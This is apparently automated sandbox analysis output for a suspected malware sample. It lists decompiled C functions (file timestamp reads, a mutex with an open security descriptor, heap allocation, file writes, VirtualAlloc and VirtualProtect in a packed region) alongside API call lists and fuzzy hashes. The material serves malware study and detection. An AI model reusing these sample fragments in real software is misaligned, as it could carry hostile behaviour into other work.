                                                                                                                                                                          • Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Time$CloseFileInfoOpenQuerySystem__aulldiv
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3147484438-0
                                                                                                                                                                          • Opcode ID: a8ab192541b304aa3f493e8cdc4c5a5724217b095628cd1a61777f2edf0513dd
                                                                                                                                                                          • Instruction ID: 6ac3f46dae9d66049611ff428ba7790207c0dca18eda03b4da7369df6ee0e458
                                                                                                                                                                          • Opcode Fuzzy Hash: a8ab192541b304aa3f493e8cdc4c5a5724217b095628cd1a61777f2edf0513dd
                                                                                                                                                                          • Instruction Fuzzy Hash: 6D21FC75E10208ABEB00CFD4C898FEEB7B9FF48704F108548E514BB290D7B59A45CBA5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 1001F3D0, Relevance: 7.6, APIs: 5, Instructions: 61timefileCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                                                          			E1001F3D0(char* _a4) {
				struct _SYSTEMTIME _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				struct _SECURITY_ATTRIBUTES* _v28;
				struct _FILETIME _v36;
				struct _FILETIME _v44;
				struct _FILETIME _v52;
				struct _FILETIME _v60;
				void* _v64;
				int _t28;
				struct _SECURITY_ATTRIBUTES* _t44;

				_v28 = 0;
				_v24 = 0;
				_t28 = PathFileExistsA(_a4); // executed
				if(_t28 != 0) {
					_v64 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0x2000000, 0);
					if(_v64 != 0xffffffff && GetFileTime(_v64,  &_v36,  &_v44,  &_v52) != 0) {
						_v20.wYear = 0x7b2;
						_v20.wMonth = 1;
						_v20.wDay = 1;
						_v20.wHour = 0;
						_v20.wMinute = 0;
						_v20.wSecond = 0;
						_v20.wMilliseconds = 0;
						SystemTimeToFileTime( &_v20,  &_v60);
						_t44 = _v36.dwLowDateTime - _v60.dwLowDateTime;
						asm("sbb eax, [ebp-0x34]");
						_v28 = E1000F290(_t44, _v36.dwHighDateTime, 0x2710, 0);
						_v24 = _t44;
					}
				}
				return _v28;
			}













                                                                                                                                                                          0x1001f3d6
                                                                                                                                                                          0x1001f3dd
                                                                                                                                                                          0x1001f3e8
                                                                                                                                                                          0x1001f3f0
                                                                                                                                                                          0x1001f412
                                                                                                                                                                          0x1001f419
                                                                                                                                                                          0x1001f435
                                                                                                                                                                          0x1001f43b
                                                                                                                                                                          0x1001f441
                                                                                                                                                                          0x1001f447
                                                                                                                                                                          0x1001f44d
                                                                                                                                                                          0x1001f453
                                                                                                                                                                          0x1001f459
                                                                                                                                                                          0x1001f467
                                                                                                                                                                          0x1001f470
                                                                                                                                                                          0x1001f476
                                                                                                                                                                          0x1001f487
                                                                                                                                                                          0x1001f48a
                                                                                                                                                                          0x1001f48a
                                                                                                                                                                          0x1001f419
                                                                                                                                                                          0x1001f496

                                                                                                                                                                          APIs
                                                                                                                                                                          • PathFileExistsA.KERNELBASE(?), ref: 1001F3E8
                                                                                                                                                                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,02000000,00000000), ref: 1001F40C
                                                                                                                                                                          • GetFileTime.KERNEL32(000000FF,?,?,?), ref: 1001F42B
                                                                                                                                                                          • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 1001F467
                                                                                                                                                                          • __aulldiv.LIBCMT ref: 1001F482
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$Time$CreateExistsPathSystem__aulldiv
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3038978132-0
                                                                                                                                                                          • Opcode ID: e720a0e6c976b777c225cc2672a2eaa0af2df3213120956698ec805836ce489b
                                                                                                                                                                          • Instruction ID: 94f5442095f36b7f33c28a28e912268f677076f0b3d524be3b20220ad1e1facd
                                                                                                                                                                          • Opcode Fuzzy Hash: e720a0e6c976b777c225cc2672a2eaa0af2df3213120956698ec805836ce489b
                                                                                                                                                                          • Instruction Fuzzy Hash: 9A21E875A10208ABEB00DFD4D899FEEB7B8EF08704F108608E505BB290D775A685CBA5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 1001A740, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 83%
                                                                                                                                                                          			E1001A740(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				char _v8;
				intOrPtr _v16;
				char _v279;
				char _v280;
				intOrPtr _v284;
				char _v312;
				signed int _v316;
				void* __ebp;
				void* _t27;
				intOrPtr _t52;
				void* _t55;

				_t51 = __esi;
				_t50 = __edi;
				_t37 = __ebx;
				_push(0xffffffff);
				_push(E10022AB3);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t52;
				_v316 = 0;
				E10001160( &_v312, __eflags, 0x10024c8f);
				_v8 = 0;
				_v280 = 0;
				E1000CF20(__edi,  &_v279, 0, 0x103);
				E1001DC00(__ebx, _t50, __esi,  &_v280); // executed
				_t46 =  &_v280;
				_t27 = E1000CAC0( &_v280);
				_t55 = _t52 - 0x12c + 0x10;
				_t59 = _t27;
				if(_t27 == 0) {
					E1000D8A3( &_v280,  &_v280, 0x104, "unknown err");
					_t55 = _t55 + 0xc;
				}
				_v284 = E1001A480(_t37, _t46, _t50, _t51, _t59,  &_v280);
				E100011C0( &_v312, _v284);
				_push(_v284);
				E1000CA30(_t37, _t50, _t51, _t59);
				E10001110(_a4, _t59,  &_v312);
				_v316 = _v316 | 0x00000001;
				_v8 = 0xffffffff;
				E100011A0( &_v312);
				 *[fs:0x0] = _v16;
				return _a4;
			}














                                                                                                                                                                          0x1001a740
                                                                                                                                                                          0x1001a740
                                                                                                                                                                          0x1001a740
                                                                                                                                                                          0x1001a743
                                                                                                                                                                          0x1001a745
                                                                                                                                                                          0x1001a750
                                                                                                                                                                          0x1001a751
                                                                                                                                                                          0x1001a75e
                                                                                                                                                                          0x1001a773
                                                                                                                                                                          0x1001a778
                                                                                                                                                                          0x1001a77f
                                                                                                                                                                          0x1001a794
                                                                                                                                                                          0x1001a7a3
                                                                                                                                                                          0x1001a7a8
                                                                                                                                                                          0x1001a7af
                                                                                                                                                                          0x1001a7b4
                                                                                                                                                                          0x1001a7b7
                                                                                                                                                                          0x1001a7b9
                                                                                                                                                                          0x1001a7cc
                                                                                                                                                                          0x1001a7d1
                                                                                                                                                                          0x1001a7d1
                                                                                                                                                                          0x1001a7e3
                                                                                                                                                                          0x1001a7f6
                                                                                                                                                                          0x1001a801
                                                                                                                                                                          0x1001a802
                                                                                                                                                                          0x1001a814
                                                                                                                                                                          0x1001a822
                                                                                                                                                                          0x1001a828
                                                                                                                                                                          0x1001a835
                                                                                                                                                                          0x1001a840
                                                                                                                                                                          0x1001a84a

                                                                                                                                                                          APIs
                                                                                                                                                                          • _memset.LIBCMT ref: 1001A794
                                                                                                                                                                            • Part of subcall function 1001DC00: _memset.LIBCMT ref: 1001DC28
                                                                                                                                                                            • Part of subcall function 1001DC00: _memset.LIBCMT ref: 1001DC45
                                                                                                                                                                            • Part of subcall function 1001DC00: _memset.LIBCMT ref: 1001DC5B
                                                                                                                                                                            • Part of subcall function 1001DC00: GetVersionExW.KERNEL32(00000114), ref: 1001DC74
                                                                                                                                                                            • Part of subcall function 1001DC00: _strcpy_s.LIBCMT ref: 1001DDA9
                                                                                                                                                                          • _strlen.LIBCMT ref: 1001A7AF
                                                                                                                                                                          • _strcpy_s.LIBCMT ref: 1001A7CC
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _memset$_strcpy_s$Version_strlen
                                                                                                                                                                          • String ID: unknown err
                                                                                                                                                                          • API String ID: 3541540748-813478822
                                                                                                                                                                          • Opcode ID: 1afc326e267b248bed630016db321b3469e2e1c022afc86cb818c24d622b85b2
                                                                                                                                                                          • Instruction ID: 908e89cf5b9352ff889f1a9c3fa8eeef98413c65ec874cc1b061f0950b8e6722
                                                                                                                                                                          • Opcode Fuzzy Hash: 1afc326e267b248bed630016db321b3469e2e1c022afc86cb818c24d622b85b2
                                                                                                                                                                          • Instruction Fuzzy Hash: 6F214FB5C0021CABDB28DB54DD82BD9B774EB04754F4041D4B609A7285EB74BB84CFD2
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00446820, Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 156COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: gD
                                                                                                                                                                          • API String ID: 0-3208440949
                                                                                                                                                                          • Opcode ID: 111f43c56742ec638a572f82f5ca4ec6e7bdecaa892b65ee4401de1ac2a03f5a
                                                                                                                                                                          • Instruction ID: 6957e882798c71108725babcfdfb57a72852dd80e4b54c1f9a550367692d2ec8
                                                                                                                                                                          • Opcode Fuzzy Hash: 111f43c56742ec638a572f82f5ca4ec6e7bdecaa892b65ee4401de1ac2a03f5a
                                                                                                                                                                          • Instruction Fuzzy Hash: C561FBB4E00209EFDB04CF94C885AAEBBB5FF49314F108159EA05AB385D774E981CFA5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 1001A0F0, Relevance: 6.0, APIs: 4, Instructions: 36synchronizationCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E1001A0F0(CHAR* _a4) {
				struct _SECURITY_DESCRIPTOR _v24;
				int _v28;
				struct _SECURITY_ATTRIBUTES _v40;
				int _v44;
				void* _t19;

				_v44 = 0;
				_v28 = 0;
				InitializeSecurityDescriptor( &_v24, 1);
				SetSecurityDescriptorDacl( &_v24, 1, 0, 0);
				_v40.nLength = 0xc;
				_v40.bInheritHandle = 1;
				_v40.lpSecurityDescriptor =  &_v24;
				_t19 = CreateMutexA( &_v40, 0, _a4); // executed
				_v28 = _t19;
				if(_v28 != 0 && GetLastError() == 0xb7) {
					_v44 = 1;
				}
				return _v44;
			}








                                                                                                                                                                          0x1001a0f6
                                                                                                                                                                          0x1001a0fd
                                                                                                                                                                          0x1001a10a
                                                                                                                                                                          0x1001a11a
                                                                                                                                                                          0x1001a120
                                                                                                                                                                          0x1001a127
                                                                                                                                                                          0x1001a131
                                                                                                                                                                          0x1001a13e
                                                                                                                                                                          0x1001a144
                                                                                                                                                                          0x1001a14b
                                                                                                                                                                          0x1001a15a
                                                                                                                                                                          0x1001a15a
                                                                                                                                                                          0x1001a167

                                                                                                                                                                          APIs
                                                                                                                                                                          • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 1001A10A
                                                                                                                                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 1001A11A
                                                                                                                                                                          • CreateMutexA.KERNELBASE(0000000C,00000000,10020584), ref: 1001A13E
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 1001A14D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DescriptorSecurity$CreateDaclErrorInitializeLastMutex
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4085719312-0
                                                                                                                                                                          • Opcode ID: 85a6fd12354dd419dd0ef30a81820dc56bd3bdf0a7a4bd4704583f47520dfa93
                                                                                                                                                                          • Instruction ID: 94a843d0d969dde2b410f28b1faa04b0eb5ecf9004c44cc09fbfa4c27db3ef7e
                                                                                                                                                                          • Opcode Fuzzy Hash: 85a6fd12354dd419dd0ef30a81820dc56bd3bdf0a7a4bd4704583f47520dfa93
                                                                                                                                                                          • Instruction Fuzzy Hash: 5A01BF70900309DFEB10DF90C999BDEBBB4EB08705F604504E605B6290D7B59A85CBB5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00446D10, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112memoryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • VirtualProtect.KERNELBASE(00000000,00000000,?,?), ref: 00446E6F
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                          • String ID: $@
                                                                                                                                                                          • API String ID: 544645111-1077428164
                                                                                                                                                                          • Opcode ID: f624bd3e15cca0fcb456706e8e4389966f128c157dc993db58a64aaca4871b9e
                                                                                                                                                                          • Instruction ID: 8c9fb8b25dea0f64debf4677d765020c59aa98c8a67f05ebdda8bc8d20a2195e
                                                                                                                                                                          • Opcode Fuzzy Hash: f624bd3e15cca0fcb456706e8e4389966f128c157dc993db58a64aaca4871b9e
                                                                                                                                                                          • Instruction Fuzzy Hash: 1C51F7B4A00219DFDB08CF88C590BEDBBF2FB89314F249259E405AB391D735A985CF95
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00446C10, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 88memoryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000065,00000000,00001000,00000004,?,00446957,?,?), ref: 00446CD4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                          • String ID: WiD$WiD
                                                                                                                                                                          • API String ID: 4275171209-2059140455
                                                                                                                                                                          • Opcode ID: 06d134ac31ed49927b0023594b9de14bb7f4387dc246311e3687aa03bac033bc
                                                                                                                                                                          • Instruction ID: 8eda7cecab3c74c8236272e2eafc45d947fea4a728d29e80eeada1299ec75620
                                                                                                                                                                          • Opcode Fuzzy Hash: 06d134ac31ed49927b0023594b9de14bb7f4387dc246311e3687aa03bac033bc
                                                                                                                                                                          • Instruction Fuzzy Hash: 3C41CCB4A00209DFDB08CF88D991EAEB7B5FF48304F208159E915AB355D734EE51CBA5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 1000CE64, Relevance: 4.6, APIs: 3, Instructions: 66memoryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 73%
                                                                                                                                                                          			E1000CE64(void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t1;
				void* _t2;
				void* _t6;
				void* _t10;
				void* _t12;
				void* _t18;
				void* _t20;
				void* _t22;
				intOrPtr _t24;
				void* _t28;
				void* _t30;
				void* _t32;

				_t18 = __edx;
				_t12 = HeapAlloc;
				do {
					_t32 =  *0x10333310; // 0xc00000
					_t20 = _t30;
					if(_t32 == 0) {
						E100119E6(_t12, _t18, _t20, _t32);
						E10011846(0x1e);
						E100115A8(0xff);
					}
					_t1 =  *0x10335f3c;
					if(_t1 != 1) {
						__eflags = _t1 - 3;
						if(__eflags != 0) {
							L10:
							__eflags = _t30;
							if(_t30 == 0) {
								_t20 = 1;
								__eflags = 1;
							}
							_t22 = _t20 + 0x0000000f & 0xfffffff0;
							__eflags = _t22;
							_push(_t22);
							goto L13;
						} else {
							_push(_t30);
							_t2 = E1000CE07(_t12, _t20, 0, __eflags);
							__eflags = _t2;
							if(__eflags == 0) {
								goto L10;
							}
						}
					} else {
						if(_t30 == 0) {
							_t10 = 1;
							__eflags = 1;
						} else {
							_t10 = _t30;
						}
						_push(_t10);
						L13:
						_push(0);
						_t2 = RtlAllocateHeap( *0x10333310); // executed
					}
					_t28 = _t2;
					if(_t28 == 0) {
						_t24 = 0xc;
						if( *0x103337d4 == _t2) {
							 *((intOrPtr*)(E1000F720(__eflags))) = _t24;
							L19:
							 *((intOrPtr*)(E1000F720(_t37))) = _t24;
						} else {
							goto L16;
						}
					}
					return _t28;
					L16:
					_t6 = E100108CA(_t30);
					_t37 = _t6;
				} while (_t6 != 0);
				goto L19;
			}


















                                                                                                                                                                          0x1000ce64
                                                                                                                                                                          0x1000ce65
                                                                                                                                                                          0x1000ce6d
                                                                                                                                                                          0x1000ce6f
                                                                                                                                                                          0x1000ce75
                                                                                                                                                                          0x1000ce77
                                                                                                                                                                          0x1000ce79
                                                                                                                                                                          0x1000ce80
                                                                                                                                                                          0x1000ce8a
                                                                                                                                                                          0x1000ce90
                                                                                                                                                                          0x1000ce91
                                                                                                                                                                          0x1000ce99
                                                                                                                                                                          0x1000cea9
                                                                                                                                                                          0x1000ceac
                                                                                                                                                                          0x1000ceb9
                                                                                                                                                                          0x1000ceb9
                                                                                                                                                                          0x1000cebb
                                                                                                                                                                          0x1000cebf
                                                                                                                                                                          0x1000cebf
                                                                                                                                                                          0x1000cebf
                                                                                                                                                                          0x1000cec3
                                                                                                                                                                          0x1000cec3
                                                                                                                                                                          0x1000cec6
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000ceae
                                                                                                                                                                          0x1000ceae
                                                                                                                                                                          0x1000ceaf
                                                                                                                                                                          0x1000ceb4
                                                                                                                                                                          0x1000ceb7
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000ceb7
                                                                                                                                                                          0x1000ce9b
                                                                                                                                                                          0x1000ce9d
                                                                                                                                                                          0x1000cea5
                                                                                                                                                                          0x1000cea5
                                                                                                                                                                          0x1000ce9f
                                                                                                                                                                          0x1000ce9f
                                                                                                                                                                          0x1000ce9f
                                                                                                                                                                          0x1000cea6
                                                                                                                                                                          0x1000cec7
                                                                                                                                                                          0x1000cec7
                                                                                                                                                                          0x1000cece
                                                                                                                                                                          0x1000cece
                                                                                                                                                                          0x1000ced0
                                                                                                                                                                          0x1000ced4
                                                                                                                                                                          0x1000cede
                                                                                                                                                                          0x1000cedf
                                                                                                                                                                          0x1000cef3
                                                                                                                                                                          0x1000cef5
                                                                                                                                                                          0x1000cefa
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000cedf
                                                                                                                                                                          0x1000cf02
                                                                                                                                                                          0x1000cee1
                                                                                                                                                                          0x1000cee2
                                                                                                                                                                          0x1000cee7
                                                                                                                                                                          0x1000cee9
                                                                                                                                                                          0x00000000

                                                                                                                                                                          APIs
                                                                                                                                                                          • __FF_MSGBANNER.LIBCMT ref: 1000CE79
                                                                                                                                                                            • Part of subcall function 100119E6: __NMSG_WRITE.LIBCMT ref: 10011A0D
                                                                                                                                                                            • Part of subcall function 100119E6: __NMSG_WRITE.LIBCMT ref: 10011A17
                                                                                                                                                                          • __NMSG_WRITE.LIBCMT ref: 1000CE80
                                                                                                                                                                            • Part of subcall function 10011846: _strcpy_s.LIBCMT ref: 100118B2
                                                                                                                                                                            • Part of subcall function 10011846: __invoke_watson.LIBCMT ref: 100118C3
                                                                                                                                                                            • Part of subcall function 10011846: GetModuleFileNameA.KERNEL32(00000000,103334D9,00000104,?,103332E0,00000000), ref: 100118DF
                                                                                                                                                                            • Part of subcall function 10011846: _strcpy_s.LIBCMT ref: 100118F4
                                                                                                                                                                            • Part of subcall function 10011846: __invoke_watson.LIBCMT ref: 10011907
                                                                                                                                                                            • Part of subcall function 10011846: _strlen.LIBCMT ref: 10011910
                                                                                                                                                                            • Part of subcall function 10011846: _strlen.LIBCMT ref: 1001191D
                                                                                                                                                                            • Part of subcall function 10011846: __invoke_watson.LIBCMT ref: 1001194A
                                                                                                                                                                            • Part of subcall function 100115A8: ___crtCorExitProcess.LIBCMT ref: 100115AC
                                                                                                                                                                            • Part of subcall function 100115A8: ExitProcess.KERNEL32 ref: 100115B6
                                                                                                                                                                            • Part of subcall function 1000CE07: ___sbh_alloc_block.LIBCMT ref: 1000CE2F
                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 1000CECE
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: __invoke_watson$ExitProcess_strcpy_s_strlen$AllocateFileHeapModuleName___crt___sbh_alloc_block
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3791426274-0
                                                                                                                                                                          • Opcode ID: ac007278a4e0de9d752827624b5274de92f56d31190f61e6d2d2646ba59319ec
                                                                                                                                                                          • Instruction ID: 6f1a83c6d6f502121b77b2a43b6d62c081e19aaa5c93b61cf19e771af3aa1e29
                                                                                                                                                                          • Opcode Fuzzy Hash: ac007278a4e0de9d752827624b5274de92f56d31190f61e6d2d2646ba59319ec
                                                                                                                                                                          • Instruction Fuzzy Hash: 5401F936B493EE9AF221D765DCC1D6E72CDDBC16F0F220126F948CA59ACB60DC8142E1
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 1001FC10, Relevance: 4.5, APIs: 3, Instructions: 34fileCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E1001FC10(CHAR* _a4, void* _a8, long _a12) {
				void* _v8;
				long _v12;
				struct _OVERLAPPED* _v16;
				void* _t12;
				int _t14;

				_v16 = 0;
				_t12 = CreateFileA(_a4, 0x40000000, 0, 0, 2, 0x80, 0); // executed
				_v8 = _t12;
				_t14 = WriteFile(_v8, _a8, _a12,  &_v12, 0); // executed
				if(_t14 != 0) {
					_v16 = 1;
				}
				CloseHandle(_v8);
				return _v16;
			}








                                                                                                                                                                          0x1001fc16
                                                                                                                                                                          0x1001fc33
                                                                                                                                                                          0x1001fc39
                                                                                                                                                                          0x1001fc4e
                                                                                                                                                                          0x1001fc56
                                                                                                                                                                          0x1001fc58
                                                                                                                                                                          0x1001fc58
                                                                                                                                                                          0x1001fc63
                                                                                                                                                                          0x1001fc6f

                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateFileA.KERNELBASE(10026888,40000000,00000000,00000000,00000002,00000080,00000000), ref: 1001FC33
                                                                                                                                                                          • WriteFile.KERNELBASE(00039E00,00000000,00000000,10026888,00000000), ref: 1001FC4E
                                                                                                                                                                          • CloseHandle.KERNEL32(00039E00), ref: 1001FC63
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1065093856-0
                                                                                                                                                                          • Opcode ID: 58dcd373d95f935da9dab33e0afd965a40fce0c80e25616e4d47ed3d20d7db64
                                                                                                                                                                          • Instruction ID: 8035e793fd9196c22525ec6c46e761f67ba1426afb40fad35566dc0bfd35744e
                                                                                                                                                                          • Opcode Fuzzy Hash: 58dcd373d95f935da9dab33e0afd965a40fce0c80e25616e4d47ed3d20d7db64
